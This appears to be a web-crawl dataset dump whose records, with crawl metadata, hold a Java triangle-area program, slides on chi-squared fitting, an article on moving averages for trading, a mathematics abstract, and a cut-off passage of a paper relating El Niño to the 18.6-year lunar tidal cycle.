msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:413ccdb3-7a43-4585-a7e9-1838d508a531>\",\"WARC-Concurrent-To\":\"<urn:uuid:e5a1d111-4860-44bd-a91e-f71b0ffbeec7>\",\"WARC-IP-Address\":\"42.51.205.25\",\"WARC-Target-URI\":\"http://suansuangua.com/c-29.html\",\"WARC-Payload-Digest\":\"sha1:KPX2XFNNJAVME2Q5X3QXTIQFLTB6O23W\",\"WARC-Block-Digest\":\"sha1:ZRIJSERRI5A54WC3Z6IQIKJPXYRQEKVP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496667262.54_warc_CC-MAIN-20191113140725-20191113164725-00272.warc.gz\"}"}
https://www.hubberspot.com/2012/05/how-to-calculate-area-of-triangle.html
[ "## Free Data Structures and Algorithms Course\n\n### How to calculate Area of Triangle through a Java program ?.\n\nProgram to calculate Area of Triangle in Java\n\n```import java.util.Scanner;\n\npublic class Triangle {\n\npublic static void main(String[] args) {\nScanner input = new Scanner(System.in);\n\ndouble base = 0;\ndouble height = 0;\ndouble area = 0;\n\nSystem.out.print(\"Enter the length of base of triangle : \");\nbase = input.nextDouble();\n\nSystem.out.print(\"Enter the length of height of triangle : \");\nheight = input.nextDouble();\n\narea = (base * height) / 2;\n\nSystem.out.println(\"\");\nSystem.out.println(\"The Area of Triangle is : \"\n+ area);\n\n}\n\n}\n\n```\n\nOutput of the program :\n\n© 2021 Learn Java by Examples Template by Hubberspot" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.587589,"math_prob":0.92579246,"size":570,"snap":"2022-27-2022-33","text_gpt3_token_len":130,"char_repetition_ratio":0.14134276,"word_repetition_ratio":0.023255814,"special_character_ratio":0.28947368,"punctuation_ratio":0.25862068,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9922015,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-02T02:04:35Z\",\"WARC-Record-ID\":\"<urn:uuid:4946696c-fca7-49a3-bf5a-0ec7938229a5>\",\"Content-Length\":\"98335\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c94d1fc-1d75-4164-8e06-e62d611131f5>\",\"WARC-Concurrent-To\":\"<urn:uuid:1e1cca06-6260-4e3a-b040-40959f9ab5d6>\",\"WARC-IP-Address\":\"142.251.16.121\",\"WARC-Target-URI\":\"https://www.hubberspot.com/2012/05/how-to-calculate-area-of-triangle.html\",\"WARC-Payload-Digest\":\"sha1:M7XMF3KLRZQ5AGLDBCB6LT4IAFGFSLYT\",\"WARC-Block-Digest\":\"sha1:JYDYI3WGMH7L6YIXEZJUJBLO6BBMDWY7\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103983398.56_warc_CC-MAIN-20220702010252-20220702040252-00210.warc.gz\"}"}
https://scholar.archive.org/work/l6v6euiswbflzfg72k73t3veki
[ "### Construction of Conservation Laws Using Symmetries [chapter]\n\nNail H. Ibragimov\n2014 Similarity and Symmetry Methods\nThe concept of nonlinear self-adjointness of differential equations, introduced by the author in 2010, is discussed in detail. All linear equations and systems are nonlinearly self-adjoint. Moreover, the class of nonlinearly self-adjoint equations includes all nonlinear equations and systems having at least one local conservation law. It follows, in particular, that the integrable systems possessing infinite set of Lie-Bäcklund symmetries (higher-order tangent transformations) are nonlinearly\nmore » ... lf-adjoint. An explicit formula for conserved vectors associated with symmetries is provided for all nonlinearly self-adjoint differential equations and systems. The number of equations contained in the systems under consideration can be different from the number of dependent variables. A utilization of conservation laws for constructing exact solutions is discussed and illustrated by computing noninvariant solutions of the Chaplygin equations in gas dynamics." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88118476,"math_prob":0.95574564,"size":859,"snap":"2022-40-2023-06","text_gpt3_token_len":205,"char_repetition_ratio":0.1251462,"word_repetition_ratio":0.0,"special_character_ratio":0.21187428,"punctuation_ratio":0.10489511,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99208945,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-28T05:26:59Z\",\"WARC-Record-ID\":\"<urn:uuid:040dc523-afa3-4946-b2a8-dc1626fa87d4>\",\"Content-Length\":\"16540\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:044ef228-8ad8-4e82-8818-d7ae9f6b9e83>\",\"WARC-Concurrent-To\":\"<urn:uuid:b5bb421f-87ef-4329-9590-bbf92f4a1146>\",\"WARC-IP-Address\":\"207.241.225.9\",\"WARC-Target-URI\":\"https://scholar.archive.org/work/l6v6euiswbflzfg72k73t3veki\",\"WARC-Payload-Digest\":\"sha1:AEZ2NR3VHBCKA24KG2N2LWB5WSE7UZ35\",\"WARC-Block-Digest\":\"sha1:2E3L4VK3JECVUIUGNW56LUCLVOP4KVQX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499470.19_warc_CC-MAIN-20230128023233-20230128053233-00785.warc.gz\"}"}
https://fr.slideserve.com/lixue/2-and-goodness-of-fit
[ "", null, "Download", null, "Download Presentation", null, "χ 2 and Goodness of Fit\n\n# χ 2 and Goodness of Fit\n\nTélécharger la présentation", null, "## χ 2 and Goodness of Fit\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -\n##### Presentation Transcript\n\n1. χ2 and Goodness of Fit Louis Lyons Oxford SLUO Lecture 3, February 2007\n\n2. Least squares best fit Resume of straight line Correlated errors Errors in x and in y Goodness of fit with χ2 Errors of first and second kind Kinematic fitting Toy example THE paradox\n\n3. Straight Line Fit N.B. L.S.B.F. passes through (<x>, <y>)\n\n4. Error on intercept and gradient That is why track parameters specified at track ‘centre’\n\n5. See Lecture 1 b y a x\n\n6. If no errors specified on yi (!)\n\n7. Summary of straight line fitting • Plot data Bad points Estimate a and b (and errors) • a and b from formula • Errors on a’ and b • Cf calculated values with estimated • Determine Smin (using a and b) • ν = n – p • Look up in χ2 tables • If probability too small, IGNORE RESULTS • If probability a “bit” small, scale errors? Asymptotically\n\n8. Measurements with correlated errorse.g. systematics?\n\n9. STRAIGHT LINE: Errors on x and on y\n\n10. Comments on Least Squares method 1) Need to bin Beware of too few events/bin 2) Extends to n dimensions  but needs lots of events for n larger than 2 or 3 3) No problem with correlated errors 4) Can calculate Smin “on line” i.e. single pass through data Σ (yi – a –bxi)2 /σ2 = [yi2] – b [xiyi] –a [yi] 5) For theory linear in params, analytic solution y 6) Hypothesis testing x\n\n11. ‘Goodness of Fit’ by parameter testing?1+(b/a) cos2θ Is b/a = 0 ? ‘Distribution testing’ is better\n\n12. Goodness of Fit: χ2test • Construct S and minimise wrt free parameters • Determine ν = no. of degrees of freedom ν = n – p n = no. of data points p = no. of FREE parameters 3) Look up probability that,forν degrees of freedom, χ2 ≥ Smin Works ASYMPTOTICALLY, otherwise use MC [Assumes yi are GAUSSIAN distributed with mean yith and variance σi2]\n\n13. χ2 with ν degrees of freedom? ν = data – free parameters ? Why asymptotic (apart from Poisson  Gaussian) ? a) Fit flatish histogram with y = N {1 + 10-6 cos(x-x0)} x0 = free param b) Neutrino oscillations: almost degenerate parameters y ~ 1 – A sin2(1.27 Δm2 L/E) 2 parameters 1 – A (1.27 Δm2 L/E)2 1 parameter Small Δm2\n\n14. Goodness of Fit: Kolmogorov-Smirnov Compares data and model cumulative plots Uses largest discrepancy between dists. Model can be analytic or MC sample Uses individual data points Not so sensitive to deviations in tails (so variants of K-S exist) Not readily extendible to more dimensions Distribution-free conversion to p; depends on n (but not when free parameters involved – needs MC)\n\n15. Goodness of fit: ‘Energy’ test • Assign +ve charge to data ; -ve charge to M.C. • Calculate ‘electrostatic energy E’ of charges • If distributions agree, E ~ 0 • If distributions don’t overlap, E is positive v2 • Assess significance of magnitude of E by MC • N.B. v1 • Works in many dimensions • Needs metric for each variable (make variances similar?) • E ~ Σ qiqj f(Δr = |ri – rj|) , f = 1/(Δr + ε) or –ln(Δr + ε) • Performance insensitive to choice of small ε • See Aslan and Zech’s paper at: http://www.ippp.dur.ac.uk/Workshops/02/statistics/program.shtml\n\n16. Wrong Decisions Error of First Kind Reject H0 when true Should happen x% of tests Errors of Second Kind Accept H0 when something else is true Frequency depends on ……… i) How similar other hypotheses are e.g. H0 = μ Alternatives are: e π K p ii) Relative frequencies: 10-4 10-4 1 0.1 0.1 Aim for maximum efficiency Low error of 1st kind maximum purity Low error of 2nd kind As χ2 cut tightens, efficiency and purity Choose compromise\n\n17. How serious are errors of 1st and 2nd kind? • Result of experiment e.g Is spin of resonance = 2? Get answer WRONG Where to set cut? Small cut Reject when correct Large cut Never reject anything Depends on nature of H0 e.g. Does answer agree with previous expt? Is expt consistent with special relativity? 2) Class selector e.g. b-quark / galaxy type / γ-induced cosmic shower Error of 1st kind: Loss of efficiency Error of 2nd kind: More background Usually easier to allow for 1st than for 2nd 3) Track finding\n\n18. Goodness of Fit: = Pattern Recognition = Find hits that belong to track Parameter Determination = Estimate track parameters (and error matrix)\n\n19. Kinematic Fitting: Why do it?\n\n20. Kinematic Fitting: Why do it?\n\n21. Toy example of Kinematic Fit\n\n22. PARADOX Histogram with 100 bins Fit with 1 parameter Smin: χ2 with NDF = 99 (Expected χ2 = 99 ± 14) For our data, Smin(p0) = 90 Is p1 acceptable if S(p1) = 115? YES. Very acceptable χ2 probability NO. σp from S(p0 +σp) = Smin +1 = 91 But S(p1) – S(p0) = 25 So p1 is 5σ away from best value\n\n23. Next time : Discovery and p-values Hope: LHC moves us from era of ‘Upper Limits’ to that of DISCOVERY" ]
[ null, "https://fr.slideserve.com/img/player/ss_download.png", null, "https://fr.slideserve.com/img/replay.png", null, "https://thumbs.slideserve.com/1_333894.jpg", null, "https://fr.slideserve.com/img/output_cBjjdt.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7390832,"math_prob":0.9614044,"size":4332,"snap":"2023-14-2023-23","text_gpt3_token_len":1211,"char_repetition_ratio":0.097042516,"word_repetition_ratio":0.0025188916,"special_character_ratio":0.27262235,"punctuation_ratio":0.088681445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9801718,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-09T21:26:49Z\",\"WARC-Record-ID\":\"<urn:uuid:adbc5667-40ce-4aa0-89e4-264c5d189c29>\",\"Content-Length\":\"95983\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5ef10922-7b5e-415d-885d-b52271d48982>\",\"WARC-Concurrent-To\":\"<urn:uuid:23bf527e-a952-4304-8435-f73a640a2e65>\",\"WARC-IP-Address\":\"44.242.49.119\",\"WARC-Target-URI\":\"https://fr.slideserve.com/lixue/2-and-goodness-of-fit\",\"WARC-Payload-Digest\":\"sha1:MFBRFUXNP3WEQZPY55HNCMGXOJCVFMJ5\",\"WARC-Block-Digest\":\"sha1:GN3K3XWJAAKPO2QPC2HSKXLQXCDIRFVQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224656833.99_warc_CC-MAIN-20230609201549-20230609231549-00723.warc.gz\"}"}
https://technicalindicators.net/indicators-technical-analysis/83-moving-averages-simple-exponential-weighted
[ "# Moving Averages\n\nPosted in Indicators of technical analysis\n\nMoving Average is a very popular indicator of technical analysis. It is broadly used because of its simplicity and possibility to combine several moving averages together. The basis is to select \"n\" - number of days during which the  prices will be averaged. The next step differs according to the type of moving average we want to calculate. There are 3 basic types of moving averages - Simple moving average, Exponential moving average and Weighted moving average.\n\n## SMA - Simple Moving Average\n\nSimple moving average formula:\n\n(Price n + Price n-1 – ...Price n-x) / x+1\n\nx+1 = number of days during which the moving average will be calculated. It is identical to the number of prices taken into consideration in the SMA construction.\n\nExample: If today's price is 11 \\$, yesterday's 10 \\$ and the day before yesterday 10 \\$ as well,  then a 3-day Simple moving average is calculated as follows: (11+10+10)/3, i.e. 10.33. Today's price is 11 \\$, 3-day moving average 10.33, so we can see immediately that the price became to rise, because it's above its moving average.\n\nSimple moving average gives all the days, implied to the calculation, the same importance. It is the main disadvantage of Simple moving average. If the farthest day implied to the calculation is extremely High or Low, the moving average can change rapidly tomorrow. In other words, if the Simple moving average changes rapidly, it doesn't have to mean there was a steep increase/decrease in the price currently. It can also mean that the farthest day implied has just fall out of the calculation. It happens in case if the value was extremelly High or Low and suddenly it's not in the average implied.\n\nThis unpleasant limitation is solved by Exponential moving average.\n\n## EMA - Exponential Moving Average\n\nExponential moving average, unlike the Simple moving average, gives higher priority to the actual data. The current values get higher importance in the EMA calculation compared to the furthest ones.\n\nEMA formula looks like follows:\n\nCalculate the parameter \"x\" (a.k.a. Alpha or SC - smoothing constant):\n\nx = 2/(n + 1)\n\nn – chosen time period for the EMA calculation.\n\nExample: If we calculate a 3-day's EMA, then x = 2/(3+1), i.e. 0.5.\n\nEMA = (Ema n-1) + [x * (Price n – Ema n-1)]\n\nEma n-1 = EMA value of the previous day\n\nPrice n = Actual Price (Today's price)\n\nExample: Should a 3-day EMA be 10 \\$ yesterday and today's price 11 \\$, then the calculation looks like follows: 10 + [0.5*(11–10)], what equals to 10.5. So the price rised to 11 \\$ and EMA rised to 10.5 \\$ from the yesterday's 10 \\$.  As you can see from the example, there is higher importance given to the actual data.\n\n## WMA - Weighted Moving Average\n\nThe last frequently used moving average is a WMA - Weighted Moving Average. WMA gives every day, implied to the calculation, different weights.  It is usual to give higher importance to actual days and lower importance to the furthest days. But it is up to you and your decision which day should be more or less significant.\n\nWMA formula looks like follows:\n\n[[(Price n * x)] + [Price n-1 * (y)] + …[Price n-2 * (z)]] / (x+y+z)\n\nPrice n = Actual price\n\nPrice n-1 = Price of the previous day\n\nPrice n-2 = Price of the day before yesterday etc.\n\nx, y, z = importance given to every single day.\n\nExample: Today's price is 11 \\$, yesterday's 10 \\$ and the day before yesterday also 10 \\$. We need to calculate 3-days WMA. The highest importance is given to the most actual day. The further the other days are, the lower weight is given to them. Calculation looks like follows: [(11*3) + (10*2) + (10*1)] / 6 =  10.5. The result shows that when price rised to 11 \\$, WMA rised to 10.5 \\$ as well.\n\nIn the end: We could see how the Moving Average calculations differ from each other. By the same entry data we got these results: SMA = 10.33; EMA = 10.50; WMA = 10.50.\n\nEMA and WMA reached higher values, because they give higher significance to the actual data and follow better the prevailing conditions on the market.\n\nNote: There are also other types of Moving averages used in technical analysis, of course. They arn't so famous and their construction is usually so complicated that we shall describe them in separate articles. For now we just mention some of the others like KAMA, HMA, FRAMA, DEMA, Vidya, T3 etc.\n\nNow we will describe how to use the Moving averages for trading to make some profits.\n\n## How to use Moving Averages for trading\n\nMoving averages are often used as a trend indicator so it can give us some hints when to go Long or Short.  The main idea is quite simple - when Close price is above its moving average, we Buy, when it is bellow its moving average, we Sell.  We change our positions every time the Close price crosses its MA. Because the Price/MA crossings can be very frequent, we can follow just he Moving Average curve. If it is rising, we buy, cause there is an Uptrend on the market. If the Moving average is decreasing, we Sell, because there is a Downtrend prevailing.", null, "There is a Blue 10-days EMA, White 21-days EMA and a Violet curve for 42-days EMA displayed in the picture above.\n\nIt is important to realize that the shorter time period we use for Moving Average calculation, the closer the Moving Average moves to the Price graph. It means the more frequent the Price/Average crossings are and the more signals to trade are given. As they come very often, there is a lot of false signals that would lead to a loss trade (have a look at he blue curve). On the contrary, the longer time period for Moving average calculation we choose, the farther it is from the Price chart and the later we enter the trades. It means the signals are not so frequent but our profits are lower, too (have a look at the violet curve).\n\nThere is also another way how to use the Moving averages. Trader doesn't have to follow the Price/MA crossings. He can follow 2 Moving Average crossings, too (take a look at the White and Blue curve crossings. They would give us very nice and profitable signals). One of the EMA is shorter, the other one Longer - e.g. EMA3 and EMA21 combination.\n\nIn other words, if we choose to follow two EMA crossings, there is not so many signals and we don't have to change our positions so often. Close price can be bellow its MA already, but the shorter Moving average is still above the longer moving average so it keeps us in the trade. 2 Moving average crossings don't follow every small price swing, so they can be pretty robust. It is an advantage especially in case the trend remains longer and does not change very often. So we can get less false signals about trend reversals. It also means that if the trend really changes, we get the signal a bit later.\n\nMoving averages are pretty useful during well trending markets. They keep us in the trade and don't allow to exit earlier than the trend really changes. It is also true that trading with Moving averages requires quite large amount of money. The Drawdown can be pretty high so we need some backup funds. It is because the Moving averages produce many signals during choppy market - i.e. when the market moves sideways. If there isn't any trend prevailing, the moving average crossings are quite frequent and there is a lot of loss trades made.\n\nIf you are interested in a deeper study of this technical indicator and prefer ready to serve solutions, this section may be of  interest to you. There you can find all the available indicators in Excel file for download.", null, "" ]
[ null, "https://technicalindicators.net/images/stories/moving_average_klzavy_priemer_no.jpg", null, "https://technicalindicators.net/images/copyright.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93370336,"math_prob":0.97414315,"size":7470,"snap":"2023-14-2023-23","text_gpt3_token_len":1749,"char_repetition_ratio":0.15912135,"word_repetition_ratio":0.020895522,"special_character_ratio":0.24056225,"punctuation_ratio":0.11258278,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9892568,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,7,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-04-01T23:03:36Z\",\"WARC-Record-ID\":\"<urn:uuid:13789c04-225a-4ab5-87cd-2d1dab068920>\",\"Content-Length\":\"26207\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:41d91f74-2ddf-4145-bf44-af95734d8499>\",\"WARC-Concurrent-To\":\"<urn:uuid:d864d9f2-41da-4fd6-a51a-9fd185512dcc>\",\"WARC-IP-Address\":\"95.168.206.199\",\"WARC-Target-URI\":\"https://technicalindicators.net/indicators-technical-analysis/83-moving-averages-simple-exponential-weighted\",\"WARC-Payload-Digest\":\"sha1:UD4WWIPML3EGTIIGKQO6TEEJMZZW33DX\",\"WARC-Block-Digest\":\"sha1:TC7JJ7T5M5LGFRG54TUJAWWEVD3YXY6C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296950363.89_warc_CC-MAIN-20230401221921-20230402011921-00217.warc.gz\"}"}
https://search.r-project.org/CRAN/refmans/bssm/html/ssm_sde.html
[ "ssm_sde {bssm} R Documentation\n\n## Univariate state space model with continuous SDE dynamics\n\n### Description\n\nConstructs an object of class `ssm_sde` by defining the functions for the drift, diffusion and derivative of diffusion terms of univariate SDE, as well as the log-density of observation equation. We assume that the observations are measured at integer times (missing values are allowed).\n\n### Usage\n\n```ssm_sde(\ny,\ndrift,\ndiffusion,\nddiffusion,\nobs_pdf,\nprior_pdf,\ntheta,\nx0,\npositive\n)\n```\n\n### Arguments\n\n `y` Observations as univariate time series (or vector) of length n. `drift, diffusion, ddiffusion` An external pointers for the C++ functions which define the drift, diffusion and derivative of diffusion functions of SDE. `obs_pdf` An external pointer for the C++ function which computes the observational log-density given the the states and parameter vector theta. `prior_pdf` An external pointer for the C++ function which computes the prior log-density given the parameter vector theta. `theta` Parameter vector passed to all model functions. `x0` Fixed initial value for SDE at time 0. `positive` If `TRUE`, positivity constraint is forced by `abs` in Milstein scheme.\n\n### Details\n\nAs in case of `ssm_nlg` models, these general models need a bit more effort from the user, as you must provide the several small C++ snippets which define the model structure. See vignettes for an example and `cpp_example_model`.\n\n### Value\n\nAn object of class `ssm_sde`.\n\n### Examples\n\n```\n# Takes a while on CRAN\nlibrary(\"sde\")\nset.seed(1)\n# theta_0 = rho = 0.5\n# theta_1 = nu = 2\n# theta_2 = sigma = 0.3\nx <- sde.sim(t0 = 0, T = 50, X0 = 1, N = 50,\ndrift = expression(0.5 * (2 - x)),\nsigma = expression(0.3),\nsigma.x = expression(0))\ny <- rpois(50, exp(x[-1]))\n\n# source c++ snippets\npntrs <- cpp_example_model(\"sde_poisson_OU\")\n\nsde_model <- ssm_sde(y, pntrs\\$drift, pntrs\\$diffusion,\npntrs\\$ddiffusion, pntrs\\$obs_density, pntrs\\$prior,\nc(rho = 0.5, nu = 2, sigma = 0.3), 1, positive = FALSE)\n\nest <- particle_smoother(sde_model, L = 12, particles = 500)\n\nts.plot(cbind(x, est\\$alphahat,\nest\\$alphahat - 2*sqrt(c(est\\$Vt)),\nest\\$alphahat + 2*sqrt(c(est\\$Vt))),\ncol = c(2, 1, 1, 1), lty = c(1, 1, 2, 2))\n\n# Takes time with finer mesh, parallelization with IS-MCMC helps a lot\nout <- run_mcmc(sde_model, L_c = 4, L_f = 8,\nparticles = 50, iter = 2e4," ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6170736,"math_prob":0.99767554,"size":2138,"snap":"2021-43-2021-49","text_gpt3_token_len":660,"char_repetition_ratio":0.11246485,"word_repetition_ratio":0.05730659,"special_character_ratio":0.30729654,"punctuation_ratio":0.17391305,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99918514,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-07T09:22:44Z\",\"WARC-Record-ID\":\"<urn:uuid:e5efb20f-31f8-4440-ae09-3979d48acc7c>\",\"Content-Length\":\"4162\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f217667f-20d7-4e5e-8255-01233d3dc18a>\",\"WARC-Concurrent-To\":\"<urn:uuid:b0dc63df-da7e-46d2-bf09-1576824da78e>\",\"WARC-IP-Address\":\"137.208.57.46\",\"WARC-Target-URI\":\"https://search.r-project.org/CRAN/refmans/bssm/html/ssm_sde.html\",\"WARC-Payload-Digest\":\"sha1:CMVXEEJSU3N5GND5MWZF7UTIFOCS4KIZ\",\"WARC-Block-Digest\":\"sha1:HIGPJMR47SXHPYYJOAKQ6L4F4XKNB3EC\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363337.27_warc_CC-MAIN-20211207075308-20211207105308-00156.warc.gz\"}"}
https://www.nature.com/articles/s41598-018-33526-4?error=cookies_not_supported&code=40232b38-05fc-4d0a-ab6f-b0a1e6784e92
[ "## Introduction\n\nEl-Niño1 is a phenomenon that sea-surface temperature (SST) in the equatorial Pacific east of 180° is warmer than usual (Fig. 1A), whereas during La-Niña, the SST is colder than usual (Fig. 1C). Coupled with this variability in SST, fluctuation in sea-level pressure (SLP) anomaly between east and west develops in the tropical Pacific (Fig. 1B,D). This is known as Southern Oscillation. These coupled air-sea phenomena are often referred to as El-Niño and Southern Oscillation (ENSO).\n\nENSO impacts global climate2 through atmospheric teleconnection3,4. Hence, ENSO has been studied intensively, and several theories5,6,7,8 of ENSO have been proposed. Seasonal ENSO forecast has been successfully performed on the basis of ENSO persistence: June-August anomaly persists and amplifies until the following winter in the northern hemisphere (February to March). However, the spring season that follows has almost no correlation with the previous winter (referred to as “spring barrier”)9,10, making long-term ENSO forecasting (beyond 1 year) difficult.\n\nFinding the relationship between ENSO and external forcings with known period and phase would contribute to the long-term forecast of ENSO. One of possible candidates for this is the 18.6-year period moon tidal cycle11 (henceforth, 18.6-yr cycle). The bi-decadal component of Pacific Decadal Oscillation12 (the first principal component of SST variability north of 20°N in the North Pacific, henceforth PDO) is known to be related to the 18.6-yr cycle13,14. Since the SST and SLP pattern of PDO is similar to ENSO12, PDO is also referred to as ENSO-like variability which affects global mean surface temperature as “hiatus”15 (global warming slowdown). ENSO could, thus, be related to the 18.6-yr cycle.\n\nThe 18.6-yr cycle is caused by the oscillation of the orbital surface of moon around the earth: the surface inclines 23.4° to the equatorial surface of earth on average and this inclination oscillates with the period of 18.613 years with the amplitude of 5.2°11. This 18.6-yr cycle causes the long-term modulation of oceanic tides where amplitudes of diurnal (semi-diurnal) components of K1 and O1 (M2) tides modulate by 11% and 19% (4%) respectively, and the amplitude modulation of the semi-diurnal M2 tide is out-of-phase from the diurnal (K1 and O1) tides11. This tidal modulation causes variations in oceanic vertical mixing variability, and could influence the oceanic and eventually climatic variability11,13.\n\nAn observational study has suggested the relationship between the 18.6-yr cycle and the timing of ENSO; stronger-than-usual El Niño events tend to occur during the periods of weak diurnal tide and low inclination of orbital surface of moon16. This is based on the information that NINO3.4 (5°S-5°N and 170°W-120°W) SST17 anomaly in the central-eastern equatorial Pacific (index for monitoring ENSO) is positive (Fig. S1A in Supplementary Information A), and the mean Southern Oscillation Index (SOI17: difference in normalized SLP, Tahiti (17°38′S, 149°27′W) minus Darwin (12°27′S, 130°50′E)) is negative (Fig. S1B) during the 5 (~18.6/4)-year period at around the minimum diurnal tide. However, when the 95% (90%) confidence interval is evaluated by $$1.96\\,(1.645)\\times \\sigma /\\sqrt{{N}_{c}},$$ where σ is the standard deviation and Nc is the degree of freedom, the means were not found to be significant. In the previous study, Nc were set at number of months16. However, monthly data cannot be considered independent due to the seasonal persistence of ENSO, and, thus, number of months is not appropriate for the degrees of freedom, and number of years should be used.\n\n## Data and Methods\n\nA composite analysis was performed in each tide year for the mature phase (December–February: DJF) ENSO (NINO3.4, SOI and NINO1 + 2: 0–10°S 90°W-80°W) time-series data17 of 1867–2015 (148 years). A 310-year-long (mostly doubled) DJF SOI time-series extending back to 1706 was also used by adding the reconstructed proxy data18 using tree-ring chronology for 1706–1866. The proxy data was adjusted (multiplied by 0.3) to the instrumental SOI17 in the overlapping period of 1867–1977 and then subtracted by the 310-year mean (−0.17). The composite analysis was also applied to global SST19 and SLP20 data.\n\nThe 0 year was set at the maximum (minimum) diurnal (semi-diurnal) tide. In the 9th–10th year, diurnal tide took the minima. El-Niño (La-Niña) tends to occur when the mean in a certain tide year is positive (negative) beyond the confidence interval of the mean. 95% (90%) confidence interval of the mean was evaluated using the formula $$1.96\\,(1.654)\\times {\\rm{\\sigma }}/\\sqrt{{N}_{c}},$$ where σ is the standard deviation and the degrees of freedom Nc ≈ N/18.6 is conservatively defined as the tidal cycle number where N is the total number of data points (year).\n\nThe tide year after the maximum diurnal tide in the 18.6-yr cycle, YTide (=Y − Ymin: Y is the year of the data and Ymin is the year of nearest minimum diurnal tide satisfying YYmin) was evaluated as follows. Since the year of 1969.25 had one of the maximum diurnal tides and the accurate period of the cycle is 18.613 years, the years Ymin at the maximum diurnal tide were calculated by rounding down to the decimal of (1969.25 + 18.613 × i + Ya), where i = 0, ±1, ±2, … and Ya = (7 − m)/12 with m (=1, …, 12) for the 1st day of each month and m (=1.5, 2.5, …, 12.5) for the day 15th of each month. Ya = 0.458 (=(7–1.5)/12) was used for the DJF mean time-series in the present study. The addition of Ya is necessary to accurately compute the nearest years of the maximum tide for a certain month of the data because the interannual nature of ENSO variability influences on the analysis and the tide year depends on month and day of the data used. For example, Ymin near the maximum of 1969.25 is 1968 for the data from 2 October to 31 December, and 1969 for the data on 1 January to 1 October.\n\nEven though some of the means were significantly different from zero, it is too early to be concluded that ENSO is related to the 18.6-yr tidal cycle. Even if ENSO occurred randomly, such random time-series with limited data length could yield some significant means. Hence, to estimate the appearance probability of such significant means from random time-series (so-called False Discovery Rate, FDR), Monte-Carlo simulations were performed using 100,000 pseudo time-series with the same 1-year lag auto-correlation (r ~ ±0.04) (i.e., red spectra), data length, standard deviation and initial conditions as those of the ENSO time-series. The time-series were generated using the formulation $$y(t)=r\\times y\\,(t-1)+{\\sigma }_{W}\\times \\varepsilon (t)$$ where y(t) is the time series in the year t, r is the 1-year lag auto-correlation coefficient of the ENSO time-series, $${\\sigma }_{W}(={\\sigma }_{R}\\sqrt{1-{r}^{2}\\,})$$ is the standard deviation of the normalized white noise ε(t), and σR the standard deviation of the ENSO time-series. Estimates of FDR using an alternative standard method21, which may be too simple to be applied to this study, were described in Supplementary Information B and Table S1.\n\n## Results\n\nA significantly (at 95% level) positive (negative) NINO3.4 SST, suggesting El-Niño (La-Niña), occurred in the 10th (3rd, 12th and 16th) year after the maximum diurnal tide in the 18.6-yr cycle (Fig. 2A), and significantly (at 95% level) negative (positive) SOI occurred in the 10th (3rd and 16th) year (Fig. 2B). For another ENSO index of the NINO1 + 2 SST for the eastern south Pacific off Peru, positive (negative) anomaly occurred in the 1st and 10th (3rd, 12th and 16th) tide years (Fig. 2C; 90% significance for 10th tide year and 95% for other tide years). The 10th year for El-Niño and the 3rd and 16th year for La-Niña are common for those 3 ENSO indices for the 148 years and 8 cycles of the 18.6-yr period.\n\nHorizontal anomaly distributions of DJF SST19 during 1854–2015 and SLP20 during 1860–2015 in the common 3rd, 10th and 16th tide year (Fig. 1) confirm the ENSO tendency as indicated by the ENSO indices (Fig. 2). SST and SLP anomaly distributions in the tropical Pacific in the 1st (Fig. 3A,B) and 12th (Fig. 3C,D) tide year also confirm the ENSO tendency from NINO1 + 2 SST (Fig. 2C for the 1st and 12th year) and NINO3.4 SST (Fig. 2A for the 12th year).\n\nThese significantly negative (positive) means of SOI suggesting El-Niño (La-Niña) tendency, were also found during the 310-year-long 1706–2015 DJF SOI time-series (Fig. 2D). Significantly negative (positive) 